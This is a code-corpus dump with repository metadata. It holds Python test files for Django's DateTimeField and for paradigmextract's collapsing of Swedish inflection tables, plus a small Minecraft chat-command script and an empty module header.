| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1cfd220534c292e1e46d89f294bc02078e07f1e
| 5,103
|
py
|
Python
|
tests/forms_tests/field_tests/test_datetimefield.py
|
imjvdn/scratch-game-1
|
5dffd79f17e0b66d3d2e57262749311aca28e850
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 19
|
2015-07-07T02:08:59.000Z
|
2021-11-08T11:05:40.000Z
|
tests/forms_tests/field_tests/test_datetimefield.py
|
imjvdn/scratch-game-1
|
5dffd79f17e0b66d3d2e57262749311aca28e850
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 57
|
2018-10-08T12:37:30.000Z
|
2018-10-08T17:39:26.000Z
|
tests/forms_tests/field_tests/test_datetimefield.py
|
imjvdn/scratch-game-1
|
5dffd79f17e0b66d3d2e57262749311aca28e850
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 145
|
2019-03-14T18:54:45.000Z
|
2022-03-04T20:25:31.000Z
|
import datetime
from django.forms import DateTimeField, ValidationError
from django.test import SimpleTestCase
class DateTimeFieldTest(SimpleTestCase):

    def test_datetimefield_1(self):
        """The default input formats accept date/datetime objects and a
        range of ISO and US-style date/time strings."""
        f = DateTimeField()
        accepted = [
            (datetime.date(2006, 10, 25), datetime.datetime(2006, 10, 25, 0, 0)),
            (datetime.datetime(2006, 10, 25, 14, 30), datetime.datetime(2006, 10, 25, 14, 30)),
            (datetime.datetime(2006, 10, 25, 14, 30, 59), datetime.datetime(2006, 10, 25, 14, 30, 59)),
            (datetime.datetime(2006, 10, 25, 14, 30, 59, 200), datetime.datetime(2006, 10, 25, 14, 30, 59, 200)),
            ('2006-10-25 14:30:45.000200', datetime.datetime(2006, 10, 25, 14, 30, 45, 200)),
            ('2006-10-25 14:30:45.0002', datetime.datetime(2006, 10, 25, 14, 30, 45, 200)),
            ('2006-10-25 14:30:45', datetime.datetime(2006, 10, 25, 14, 30, 45)),
            ('2006-10-25 14:30:00', datetime.datetime(2006, 10, 25, 14, 30)),
            ('2006-10-25 14:30', datetime.datetime(2006, 10, 25, 14, 30)),
            ('2006-10-25', datetime.datetime(2006, 10, 25, 0, 0)),
            ('10/25/2006 14:30:45.000200', datetime.datetime(2006, 10, 25, 14, 30, 45, 200)),
            ('10/25/2006 14:30:45', datetime.datetime(2006, 10, 25, 14, 30, 45)),
            ('10/25/2006 14:30:00', datetime.datetime(2006, 10, 25, 14, 30)),
            ('10/25/2006 14:30', datetime.datetime(2006, 10, 25, 14, 30)),
            ('10/25/2006', datetime.datetime(2006, 10, 25, 0, 0)),
            ('10/25/06 14:30:45.000200', datetime.datetime(2006, 10, 25, 14, 30, 45, 200)),
            ('10/25/06 14:30:45', datetime.datetime(2006, 10, 25, 14, 30, 45)),
            ('10/25/06 14:30:00', datetime.datetime(2006, 10, 25, 14, 30)),
            ('10/25/06 14:30', datetime.datetime(2006, 10, 25, 14, 30)),
            ('10/25/06', datetime.datetime(2006, 10, 25, 0, 0)),
        ]
        for raw, parsed in accepted:
            self.assertEqual(parsed, f.clean(raw))
        for raw in ('hello', '2006-10-25 4:30 p.m.'):
            with self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'"):
                f.clean(raw)

    def test_datetimefield_2(self):
        """A custom input_formats list replaces the default string formats;
        date/datetime objects are still accepted directly."""
        f = DateTimeField(input_formats=['%Y %m %d %I:%M %p'])
        accepted = [
            (datetime.date(2006, 10, 25), datetime.datetime(2006, 10, 25, 0, 0)),
            (datetime.datetime(2006, 10, 25, 14, 30), datetime.datetime(2006, 10, 25, 14, 30)),
            (datetime.datetime(2006, 10, 25, 14, 30, 59), datetime.datetime(2006, 10, 25, 14, 30, 59)),
            (datetime.datetime(2006, 10, 25, 14, 30, 59, 200), datetime.datetime(2006, 10, 25, 14, 30, 59, 200)),
            ('2006 10 25 2:30 PM', datetime.datetime(2006, 10, 25, 14, 30)),
        ]
        for raw, parsed in accepted:
            self.assertEqual(parsed, f.clean(raw))
        # The ISO format is no longer in the accepted set.
        with self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'"):
            f.clean('2006-10-25 14:30:45')

    def test_datetimefield_3(self):
        """A non-required field cleans empty input to None."""
        f = DateTimeField(required=False)
        for empty in (None, ''):
            self.assertIsNone(f.clean(empty))
            self.assertEqual('None', repr(f.clean(empty)))

    def test_datetimefield_4(self):
        """Surrounding whitespace is stripped before parsing (#5714)."""
        f = DateTimeField()
        accepted = [
            (' 2006-10-25 14:30:45 ', datetime.datetime(2006, 10, 25, 14, 30, 45)),
            (' 2006-10-25 ', datetime.datetime(2006, 10, 25, 0, 0)),
            (' 10/25/2006 14:30:45 ', datetime.datetime(2006, 10, 25, 14, 30, 45)),
            (' 10/25/2006 14:30 ', datetime.datetime(2006, 10, 25, 14, 30)),
            (' 10/25/2006 ', datetime.datetime(2006, 10, 25, 0, 0)),
            (' 10/25/06 14:30:45 ', datetime.datetime(2006, 10, 25, 14, 30, 45)),
            (' 10/25/06 ', datetime.datetime(2006, 10, 25, 0, 0)),
        ]
        for raw, parsed in accepted:
            self.assertEqual(parsed, f.clean(raw))
        # Whitespace-only input is not a valid date/time.
        with self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'"):
            f.clean(' ')

    def test_datetimefield_5(self):
        """%f in a custom format parses fractional seconds."""
        f = DateTimeField(input_formats=['%Y.%m.%d %H:%M:%S.%f'])
        self.assertEqual(
            datetime.datetime(2006, 10, 25, 14, 30, 45, 200),
            f.clean('2006.10.25 14:30:45.0002'),
        )

    def test_datetimefield_changed(self):
        """has_changed() parses the submitted string with the field's own
        input format before comparing against the initial value."""
        fmt = '%Y %m %d %I:%M %p'
        f = DateTimeField(input_formats=[fmt])
        initial = datetime.datetime(2006, 9, 17, 14, 30, 0)
        self.assertFalse(f.has_changed(initial, '2006 09 17 2:30 PM'))
| 58.655172
| 115
| 0.621987
| 769
| 5,103
| 4.106632
| 0.088427
| 0.08613
| 0.134262
| 0.271691
| 0.838822
| 0.826156
| 0.80494
| 0.80494
| 0.780241
| 0.780241
| 0
| 0.222304
| 0.202234
| 5,103
| 86
| 116
| 59.337209
| 0.553427
| 0.008034
| 0
| 0.473684
| 0
| 0
| 0.132833
| 0
| 0
| 0
| 0
| 0
| 0.552632
| 1
| 0.078947
| false
| 0
| 0.039474
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
62a3bf9b3927642ba45a835b9cdac9f6451b7f9a
| 49,127
|
py
|
Python
|
tests/unit_tests/learning/test_collapse_tables.py
|
spraakbanken/paradigmextract
|
12dfda604ff72b5a951a89bd515f893bf01f2860
|
[
"MIT"
] | 2
|
2018-03-01T15:48:16.000Z
|
2019-05-07T11:28:19.000Z
|
tests/unit_tests/learning/test_collapse_tables.py
|
spraakbanken/paradigmextract
|
12dfda604ff72b5a951a89bd515f893bf01f2860
|
[
"MIT"
] | 1
|
2017-11-30T07:40:41.000Z
|
2017-11-30T07:40:41.000Z
|
tests/unit_tests/learning/test_collapse_tables.py
|
spraakbanken/paradigmextract
|
12dfda604ff72b5a951a89bd515f893bf01f2860
|
[
"MIT"
] | 1
|
2018-03-05T07:45:22.000Z
|
2018-03-05T07:45:22.000Z
|
from paradigmextract.pextract import _collapse_tables
def test1():
    """Two tables with the same variable pattern collapse into one paradigm."""
    filteredtables = [
        (
            "stad",
            ("msd", "sg indef nom"),
            [
                ["stad", "städer", "stads"],
                ("[st]a[d]", "[st]ä[d]er", "[st]a[d]s"),
                ["1+a+2", "1+ä+2+er", "1+a+2+s"],
                ["st", "d"],
                2,
                3,
            ],
            [("msd", "sg indef nom"), ("msd", "pl indef nom"), ("msd", "sg indef gen")],
        ),
        (
            "bad",
            ("msd", "sg indef nom"),
            [
                ["bad", "bäder", "bads"],
                ("[b]a[d]", "[b]ä[d]er", "[b]a[d]s"),
                ["1+a+2", "1+ä+2+er", "1+a+2+s"],
                ["b", "d"],
                2,
                3,
            ],
            [("msd", "sg indef nom"), ("msd", "pl indef nom"), ("msd", "sg indef gen")],
        ),
    ]
    paradigmlist = _collapse_tables(filteredtables)
    # Both tables share the "1+a+2 / 1+ä+2+er / 1+a+2+s" shape -> one paradigm.
    assert len(paradigmlist) == 1
    var_insts = paradigmlist[0].var_insts
    # Variable instantiations for each merged word, in insertion order.
    assert ("1", "b") in var_insts[0]
    assert ("2", "d") in var_insts[0]
    assert ("1", "st") in var_insts[1]
    assert ("2", "d") in var_insts[1]
def test2():
    """Tables with different variable patterns stay in separate paradigms."""
    filteredtables = [
        (
            "bord",
            ("msd", "sg indef nom"),
            [
                ["bord", "bord", "bords"],
                ("[bord]", "[bord]", "[bord]s"),
                ["1", "1", "1+s"],
                ["bord"],
                1,
                0,
            ],
            [("msd", "sg indef nom"), ("msd", "pl indef nom"), ("msd", "sg indef gen")],
        ),
        (
            "bad",
            ("msd", "sg indef nom"),
            [
                ["bad", "bäder", "bads"],
                ("[b]a[d]", "[b]ä[d]er", "[b]a[d]s"),
                ["1+a+2", "1+ä+2+er", "1+a+2+s"],
                ["b", "d"],
                2,
                3,
            ],
            [("msd", "sg indef nom"), ("msd", "pl indef nom"), ("msd", "sg indef gen")],
        ),
    ]
    paradigmlist = _collapse_tables(filteredtables)
    # One-variable "bord" cannot merge with the two-variable umlaut pattern.
    assert len(paradigmlist) == 2
    assert ("1", "bord") in paradigmlist[0].var_insts[0]
    second = paradigmlist[1].var_insts[0]
    assert ("1", "b") in second
    assert ("2", "d") in second
def test_transient():
    """Four phrasal verbs ("X bort") that all inflect identically collapse
    into a single paradigm.

    The original hand-written tables are perfectly regular, so they are
    generated here from the stem and a shared (suffix, prefixed) slot list;
    the resulting data is value-identical to the literals it replaces.
    """
    # Each slot is (suffix, prefixed).  prefixed=False renders
    # "<stem><suffix> bort"; prefixed=True renders "bort<stem><suffix>".
    slots = [
        ("r", False), ("s", False), ("de", False), ("des", False),
        ("", False), ("", False), ("s", False),
        ("t", False), ("ts", False),
        ("nde", False), ("ndes", False),
        ("d", False), ("d", True),
        ("ds", False), ("ds", True),
        ("t", False), ("t", True),
        ("ts", False), ("ts", True),
    ] + [("de", False), ("de", True), ("des", False), ("des", True)] * 4

    # The 35 MSD tags, aligned one-to-one with `slots`.
    tags = [
        ("msd", "pres ind aktiv"),
        ("msd", "pres ind s-form"),
        ("msd", "pret ind aktiv"),
        ("msd", "pret ind s-form"),
        ("msd", "imper"),
        ("msd", "inf aktiv"),
        ("msd", "inf s-form"),
        ("msd", "sup aktiv"),
        ("msd", "sup s-form"),
        ("msd", "pres_part nom"),
        ("msd", "pres_part gen"),
    ]
    # Every participle tag appears twice: once for the "X bort" form and
    # once for the fused "bortX" form.
    for msd in (
        "pret_part indef sg u nom", "pret_part indef sg u gen",
        "pret_part indef sg n nom", "pret_part indef sg n gen",
        "pret_part indef pl nom", "pret_part indef pl gen",
        "pret_part def sg no_masc nom", "pret_part def sg no_masc gen",
        "pret_part def sg masc nom", "pret_part def sg masc gen",
        "pret_part def pl nom", "pret_part def pl gen",
    ):
        tags += [("msd", msd), ("msd", msd)]

    def make_entry(stem):
        # Build (surface forms, bracketed forms, variable forms) per slot.
        forms = []
        bracketed = []
        variable_forms = []
        for suffix, prefixed in slots:
            if prefixed:
                forms.append("bort" + stem + suffix)
                bracketed.append("bort[" + stem + "]" + suffix)
                variable_forms.append("bort+1+" + suffix)
            else:
                forms.append(stem + suffix + " bort")
                bracketed.append("[" + stem + "]" + suffix + " bort")
                variable_forms.append("1+" + suffix + " bort")
        return (
            stem + "r bort",                # id form (pres ind aktiv)
            ("msd", "pres ind aktiv"),      # id tag
            [forms, tuple(bracketed), variable_forms, [stem], 1, 0],
            list(tags),                     # fresh list per entry, as before
        )

    filtered_tables = [
        make_entry(stem) for stem in ("sopa", "jaga", "kollra", "gallra")
    ]
    paradigmlist = _collapse_tables(filtered_tables)
    # All four verbs share one inflection pattern -> exactly one paradigm.
    assert len(paradigmlist) == 1
def test_transient2():
filtered_tables = [
(
"sopar bort",
("msd", "pres ind aktiv"),
[
[
"sopar bort",
"sopas bort",
"sopade bort",
"sopades bort",
"sopa bort",
"sopa bort",
"sopas bort",
"sopat bort",
"sopats bort",
"sopande bort",
"sopandes bort",
"sopad bort",
"bortsopad",
"sopads bort",
"bortsopads",
"sopat bort",
"bortsopat",
"sopats bort",
"bortsopats",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
],
(
"[sopa]r bort",
"[sopa]s bort",
"[sopa]de bort",
"[sopa]des bort",
"[sopa] bort",
"[sopa] bort",
"[sopa]s bort",
"[sopa]t bort",
"[sopa]ts bort",
"[sopa]nde bort",
"[sopa]ndes bort",
"[sopa]d bort",
"bort[sopa]d",
"[sopa]ds bort",
"bort[sopa]ds",
"[sopa]t bort",
"bort[sopa]t",
"[sopa]ts bort",
"bort[sopa]ts",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
],
["sopa"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
(
"jagar bort",
("msd", "pres ind aktiv"),
[
[
"jagar bort",
"jagas bort",
"jagade bort",
"jagades bort",
"jaga bort",
"jaga bort",
"jagas bort",
"jagat bort",
"jagats bort",
"jagande bort",
"jagandes bort",
"jagad bort",
"bortjagad",
"jagads bort",
"bortjagads",
"jagat bort",
"bortjagat",
"jagats bort",
"bortjagats",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
],
(
"jagar [bort]",
"jagas [bort]",
"jagade [bort]",
"jagades [bort]",
"jaga [bort]",
"jaga [bort]",
"jagas [bort]",
"jagat [bort]",
"jagats [bort]",
"jagande [bort]",
"jagandes [bort]",
"jagad [bort]",
"[bort]jagad",
"jagads [bort]",
"[bort]jagads",
"jagat [bort]",
"[bort]jagat",
"jagats [bort]",
"[bort]jagats",
"jagade [bort]",
"[bort]jagade",
"jagades [bort]",
"[bort]jagades",
"jagade [bort]",
"[bort]jagade",
"jagades [bort]",
"[bort]jagades",
"jagade [bort]",
"[bort]jagade",
"jagades [bort]",
"[bort]jagades",
"jagade [bort]",
"[bort]jagade",
"jagades [bort]",
"[bort]jagades",
),
[
"jagar +1",
"jagas +1",
"jagade +1",
"jagades +1",
"jaga +1",
"jaga +1",
"jagas +1",
"jagat +1",
"jagats +1",
"jagande +1",
"jagandes +1",
"jagad +1",
"1+jagad",
"jagads +1",
"1+jagads",
"jagat +1",
"1+jagat",
"jagats +1",
"1+jagats",
"jagade +1",
"1+jagade",
"jagades +1",
"1+jagades",
"jagade +1",
"1+jagade",
"jagades +1",
"1+jagades",
"jagade +1",
"1+jagade",
"jagades +1",
"1+jagades",
"jagade +1",
"1+jagade",
"jagades +1",
"1+jagades",
],
["bort"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
(
"kollrar bort",
("msd", "pres ind aktiv"),
[
[
"kollrar bort",
"kollras bort",
"kollrade bort",
"kollrades bort",
"kollra bort",
"kollra bort",
"kollras bort",
"kollrat bort",
"kollrats bort",
"kollrande bort",
"kollrandes bort",
"kollrad bort",
"bortkollrad",
"kollrads bort",
"bortkollrads",
"kollrat bort",
"bortkollrat",
"kollrats bort",
"bortkollrats",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
],
(
"[kollra]r bort",
"[kollra]s bort",
"[kollra]de bort",
"[kollra]des bort",
"[kollra] bort",
"[kollra] bort",
"[kollra]s bort",
"[kollra]t bort",
"[kollra]ts bort",
"[kollra]nde bort",
"[kollra]ndes bort",
"[kollra]d bort",
"bort[kollra]d",
"[kollra]ds bort",
"bort[kollra]ds",
"[kollra]t bort",
"bort[kollra]t",
"[kollra]ts bort",
"bort[kollra]ts",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
],
["kollra"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
(
"gallrar bort",
("msd", "pres ind aktiv"),
[
[
"gallrar bort",
"gallras bort",
"gallrade bort",
"gallrades bort",
"gallra bort",
"gallra bort",
"gallras bort",
"gallrat bort",
"gallrats bort",
"gallrande bort",
"gallrandes bort",
"gallrad bort",
"bortgallrad",
"gallrads bort",
"bortgallrads",
"gallrat bort",
"bortgallrat",
"gallrats bort",
"bortgallrats",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
],
(
"[gallra]r bort",
"[gallra]s bort",
"[gallra]de bort",
"[gallra]des bort",
"[gallra] bort",
"[gallra] bort",
"[gallra]s bort",
"[gallra]t bort",
"[gallra]ts bort",
"[gallra]nde bort",
"[gallra]ndes bort",
"[gallra]d bort",
"bort[gallra]d",
"[gallra]ds bort",
"bort[gallra]ds",
"[gallra]t bort",
"bort[gallra]t",
"[gallra]ts bort",
"bort[gallra]ts",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
],
["gallra"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
]
paradigmlist = _collapse_tables(filtered_tables)
assert len(paradigmlist) == 2
| 35.859124
| 86
| 0.317341
| 4,146
| 49,127
| 3.693439
| 0.034973
| 0.095083
| 0.137922
| 0.087769
| 0.958205
| 0.954548
| 0.950369
| 0.950369
| 0.946647
| 0.946647
| 0
| 0.015742
| 0.548721
| 49,127
| 1,369
| 87
| 35.885318
| 0.674966
| 0
| 0
| 0.91796
| 0
| 0
| 0.341686
| 0
| 0
| 0
| 0
| 0
| 0.00813
| 1
| 0.002956
| false
| 0
| 0.000739
| 0
| 0.003695
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
62f1f956df117f937ab1becfb36b41bfd62406cd
| 116
|
py
|
Python
|
001_PrintName/printName.py
|
kmranrg/CodeInMinecraftWithAnurag
|
982e408f57a58d767b4f636240c627bffad6de21
|
[
"BSD-3-Clause"
] | null | null | null |
001_PrintName/printName.py
|
kmranrg/CodeInMinecraftWithAnurag
|
982e408f57a58d767b4f636240c627bffad6de21
|
[
"BSD-3-Clause"
] | null | null | null |
001_PrintName/printName.py
|
kmranrg/CodeInMinecraftWithAnurag
|
982e408f57a58d767b4f636240c627bffad6de21
|
[
"BSD-3-Clause"
] | null | null | null |
def on_on_chat():
blocks.print("ANURAG", BLUE_WOOL, pos(0, 0, 0), EAST)
player.on_chat("printName", on_on_chat)
| 29
| 57
| 0.698276
| 21
| 116
| 3.571429
| 0.619048
| 0.24
| 0.213333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029412
| 0.12069
| 116
| 3
| 58
| 38.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0.12931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
62f356446f0ff7235ea9396bdda591d503010db9
| 109
|
py
|
Python
|
codes/style/training/Discriminators/__init__.py
|
liweileev/SOMGAN
|
11ec1c01b288a00f5a49906b9e683e67d3509701
|
[
"MIT"
] | null | null | null |
codes/style/training/Discriminators/__init__.py
|
liweileev/SOMGAN
|
11ec1c01b288a00f5a49906b9e683e67d3509701
|
[
"MIT"
] | null | null | null |
codes/style/training/Discriminators/__init__.py
|
liweileev/SOMGAN
|
11ec1c01b288a00f5a49906b9e683e67d3509701
|
[
"MIT"
] | null | null | null |
'''
Author: Liweileev
Date: 2022-01-04 23:12:38
LastEditors: Liweileev
LastEditTime: 2022-01-04 23:12:38
'''
| 15.571429
| 33
| 0.724771
| 18
| 109
| 4.388889
| 0.611111
| 0.151899
| 0.202532
| 0.253165
| 0.35443
| 0.35443
| 0
| 0
| 0
| 0
| 0
| 0.28866
| 0.110092
| 109
| 6
| 34
| 18.166667
| 0.525773
| 0.917431
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7ef013470d26992a1fe799f4503de6d82ab759e
| 7,161
|
py
|
Python
|
lib/python2.7/site-packages/networkx/algorithms/bipartite/tests/test_generators.py
|
nishaero/wifi-userseg-ryu
|
1132f2c813b79eff755bdd1a9e73e7ad3980af7c
|
[
"Apache-2.0"
] | 15
|
2018-04-26T08:17:18.000Z
|
2021-03-05T08:44:13.000Z
|
lib/python2.7/site-packages/networkx/algorithms/bipartite/tests/test_generators.py
|
nishaero/wifi-userseg-ryu
|
